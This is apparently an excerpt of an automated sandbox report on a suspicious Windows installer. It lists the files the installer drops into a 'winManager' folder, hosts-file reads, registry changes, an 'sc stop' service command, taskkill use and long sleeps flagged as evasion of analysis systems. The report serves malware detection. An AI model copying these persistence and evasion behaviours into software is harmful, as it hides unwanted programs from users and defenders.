Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\winManager\FLServer.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\winManager\FLServer.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\winManager\FLServer.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\winManager\FLServer.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\winManager\FLServer.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeFile opened: C:\Windows\SysWOW64\Msftedit.dllJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: _____NCM______2_10042231.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeRegistry value created: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\winManagerJump to behavior
Source: _____NCM______2_10042231.exeStatic file information: File size 21154848 > 1048576
Source: _____NCM______2_10042231.exeStatic PE information: certificate valid
Source: _____NCM______2_10042231.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x40f600
Source: _____NCM______2_10042231.exeStatic PE information: Raw size of .data is bigger than: 0x100000 < 0xef1600
Source: _____NCM______2_10042231.exeStatic PE information: More than 200 imports for KERNEL32.dll
Source: _____NCM______2_10042231.exeStatic PE information: More than 200 imports for USER32.dll
Source: _____NCM______2_10042231.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: P:\Target\x64\ship\groove\x-none\grooveex.pdbeex.pdb000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 source: explorer.exe, 00000012.00000002.778552460.00007FFC1B351000.00000020.00000001.01000000.0000001A.sdmp
Source: Binary string: P:\Target\x64\ship\groove\x-none\grooveex.pdb source: explorer.exe, 00000012.00000002.778552460.00007FFC1B351000.00000020.00000001.01000000.0000001A.sdmp
Source: Binary string: E:\UIDownloader\bin\Release\setup_1_237148.pdb source: _____NCM______2_10042231.exe, 00000000.00000000.369683496.0000000000811000.00000002.00000001.01000000.00000003.sdmp, _____NCM______2_10042231.exe, 00000000.00000002.722085107.0000000000811000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D_WIN32_WINNT=0x0501 -D_USING_V110_SDK71_ source: _____NCM______2_10042231.exe, 00000000.00000000.369683496.0000000000811000.00000002.00000001.01000000.00000003.sdmp, _____NCM______2_10042231.exe, 00000000.00000002.722085107.0000000000811000.00000002.00000001.01000000.00000003.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.618923470.000000001002D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: E:\FLManager\temp\Link\FLManager\Release\winManager.pdb source: _____NCM______2_10042231.exe, 00000000.00000003.618923470.000000001002D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: F:\cpp\vcpkg\buildtrees\zlib\x86-windows-rel\zlib.pdb## source: _____NCM______2_10042231.exe, 00000000.00000003.618841166.000000000F530000.00000004.00001000.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.618923470.000000001002D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: F:\cpp\vcpkg\buildtrees\zlib\x86-windows-rel\zlib.pdb source: _____NCM______2_10042231.exe, 00000000.00000003.618841166.000000000F530000.00000004.00001000.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.618923470.000000001002D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: E:\UIDownloader\bin\Release\Kernel.pdb source: _____NCM______2_10042231.exe, 00000000.00000003.420609026.0000000001A2D000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.661196321.0000000001A2F000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.661103501.0000000010013000.00000002.00001000.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.373955181.0000000001A2D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: eex.pdb source: explorer.exe, 00000012.00000002.778552460.00007FFC1B351000.00000020.00000001.01000000.0000001A.sdmp
Source: Binary string: ?..\..\crypto\stack\stack.ccompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D_WIN32_WINNT=0x0501 -D_USING_V110_SDK71_..\..\crypto\ex_data.c source: _____NCM______2_10042231.exe, 00000000.00000000.369683496.0000000000811000.00000002.00000001.01000000.00000003.sdmp, _____NCM______2_10042231.exe, 00000000.00000002.722085107.0000000000811000.00000002.00000001.01000000.00000003.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.618923470.000000001002D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\work\MAS_Debug\Temp\Link\WinLead\Release\WinLead.pdb source: _____NCM______2_10042231.exe, 00000000.00000003.618923470.000000001002D000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeCode function: 0_3_10003456 push ecx; ret 0_3_10003469
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeCode function: 0_2_0059B446 push ecx; ret 0_2_0059B459
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeCode function: 23_2_001762C6 push ecx; ret 23_2_001762D9
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeCode function: 0_3_10001580 Spro7,GetModuleHandleW,LoadLibraryW,GetProcAddress,GetProcAddress,GetNativeSystemInfo,GetProcAddress,GetCurrentProcess,0_3_10001580
Source: api-ms-win-core-handle-l1-1-0.dll.0.drStatic PE information: 0xA7DDA20D [Mon Mar 31 07:06:53 2059 UTC]
Source: libcrypto-1_1.dll.0.drStatic PE information: section name: .00cfg
Source: libssl-1_1.dll.0.drStatic PE information: section name: .00cfg
Source: msvcp140.dll.0.drStatic PE information: section name: .didat
Source: initial sampleStatic PE information: section name: .text entropy: 6.95576372950548
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeFile created: C:\Users\user\AppData\Local\winManager\libcrypto-1_1.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeFile created: C:\Users\user\AppData\Local\winManager\node.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeFile created: C:\Users\user\AppData\Local\winManager\api-ms-win-core-string-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeFile created: C:\Users\user\AppData\Local\winManager\api-ms-win-core-console-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeFile created: C:\Users\user\AppData\Local\winManager\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeFile created: C:\Users\user\AppData\Local\winManager\soui-sys-resource.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeFile created: C:\Users\user\AppData\Local\winManager\libssl-1_1.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeFile created: C:\Users\user\AppData\Local\winManager\api-ms-win-core-file-l1-2-0.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeFile created: C:\Users\user\AppData\Local\winManager\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeFile created: C:\Users\user\AppData\Local\winManager\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeFile created: C:\Users\user\AppData\Local\winManager\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeFile created: C:\Users\user\AppData\Local\winManager\render-skia.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeFile created: C:\Users\user\AppData\Local\winManager\jsoncpp.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeFile created: C:\Users\user\AppData\Local\winManager\leave.exeJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeFile created: C:\Users\user\AppData\Local\winManager\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeFile created: C:\Users\user\AppData\Local\winManager\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeFile created: C:\Users\user\AppData\Local\winManager\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeFile created: C:\Users\user\AppData\Local\winManager\zlib1.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeFile created: C:\Users\user\AppData\Local\winManager\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeFile created: C:\Users\user\AppData\Local\winManager\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeFile created: C:\Users\user\AppData\Local\winManager\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeFile created: C:\Users\user\AppData\Local\winManager\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeFile created: C:\Users\user\AppData\Local\winManager\imgdecoder-png.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeFile created: C:\Users\user\AppData\Local\winManager\utilities.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeFile created: C:\Users\user\AppData\Local\winManager\ucrtbase.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeFile created: C:\Users\user\AppData\Local\winManager\FLServer.exeJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeFile created: C:\Users\user\AppData\Local\winManager\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeFile created: C:\Users\user\AppData\Local\winManager\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeFile created: C:\Users\user\AppData\Local\winManager\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeFile created: C:\Users\user\AppData\Local\winManager\libcurl.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeFile created: C:\Users\user\AppData\Local\winManager\api-ms-win-crt-private-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeFile created: C:\Users\user\AppData\Local\winManager\API-MS-Win-core-xstate-l2-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeFile created: C:\Users\user\AppData\Local\Temp\hDxGcHaQeXbCzSxU\KitTip.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeFile created: C:\Users\user\AppData\Local\winManager\api-ms-win-core-file-l2-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeFile created: C:\Users\user\AppData\Local\winManager\api-ms-win-core-fibers-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeFile created: C:\Users\user\AppData\Local\winManager\FLMgrUpdate.exeJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeFile created: C:\Users\user\AppData\Local\winManager\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeFile created: C:\Users\user\AppData\Local\winManager\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeFile created: C:\Users\user\AppData\Local\winManager\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeFile created: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeFile created: C:\Users\user\AppData\Local\winManager\resprovider-zip.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeFile created: C:\Users\user\AppData\Local\winManager\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeFile created: C:\Users\user\AppData\Local\winManager\api-ms-win-crt-multibyte-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeFile created: C:\Users\user\AppData\Local\winManager\soui3.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeFile created: C:\Users\user\AppData\Local\winManager\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeFile created: C:\Users\user\AppData\Local\winManager\CrashRpt.dllJump to dropped file
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeFile created: C:\Users\user\AppData\Local\Temp\KitTip\KitTip.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeFile created: C:\Users\user\AppData\Local\winManager\DuiLib.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeFile created: C:\Users\user\AppData\Local\winManager\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeFile created: C:\Users\user\AppData\Local\winManager\imgdecoder-gdip.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeFile created: C:\Users\user\AppData\Local\winManager\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeFile created: C:\Users\user\AppData\Local\winManager\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeFile created: C:\Users\user\AppData\Local\winManager\msvcp120.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeFile created: C:\Users\user\AppData\Local\winManager\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeFile created: C:\Users\user\AppData\Local\winManager\msvcr120.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeFile created: C:\Users\user\AppData\Local\winManager\zlibwapi.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeFile created: C:\Users\user\AppData\Local\winManager\concrt140.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeFile created: C:\Users\user\AppData\Local\winManager\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeFile created: C:\Users\user\AppData\Local\winManager\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeFile created: C:\Users\user\AppData\Local\winManager\FLPdfTrans.exeJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeFile created: C:\Users\user\AppData\Local\winManager\api-ms-win-core-util-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeFile created: C:\Users\user\AppData\Local\winManager\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeFile created: C:\Users\user\AppData\Local\winManager\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeFile created: C:\Users\user\AppData\Local\winManager\CrashSender.exeJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeFile created: C:\Users\user\AppData\Local\winManager\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeFile created: C:\Users\user\AppData\Local\winManager\winLead.exeJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeFile created: C:\Users\user\AppData\Local\winManager\libqpdf.dllJump to dropped file
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeFile created: C:\Users\user\AppData\Local\Temp\hDxGcHaQeXbCzSxU\InternetKitTip.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeFile created: C:\Users\user\AppData\Local\winManager\FLExt.exeJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeFile created: C:\Users\user\AppData\Local\winManager\api-ms-win-core-file-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeFile created: C:\Users\user\AppData\Local\winManager\msvcp140.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeFile created: C:\Users\user\AppData\Local\winManager\vcruntime140.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeFile created: C:\Users\user\AppData\Local\winManager\api-ms-win-core-console-l1-2-0.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeFile created: C:\Users\user\AppData\Local\winManager\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeFile created: C:\Users\user\AppData\Local\winManager\winManager.exeJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeFile created: C:\Users\user\AppData\Local\winManager\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeFile created: C:\Users\user\AppData\Local\winManager\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeFile created: C:\Users\user\AppData\Local\winManager\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop SoftUpdateSrv
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\winManager\FLServer.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\winManager\FLServer.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeStalling execution: Execution stalls by calling Sleepgraph_23-11979
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exe TID: 6936Thread sleep time: -90000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exe TID: 5824Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exe TID: 3236Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exe TID: 3968Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exe TID: 4852Thread sleep time: -7200000s >= -30000s
Source: C:\Users\user\AppData\Local\winManager\FLServer.exe TID: 988Thread sleep time: -30000s >= -30000s
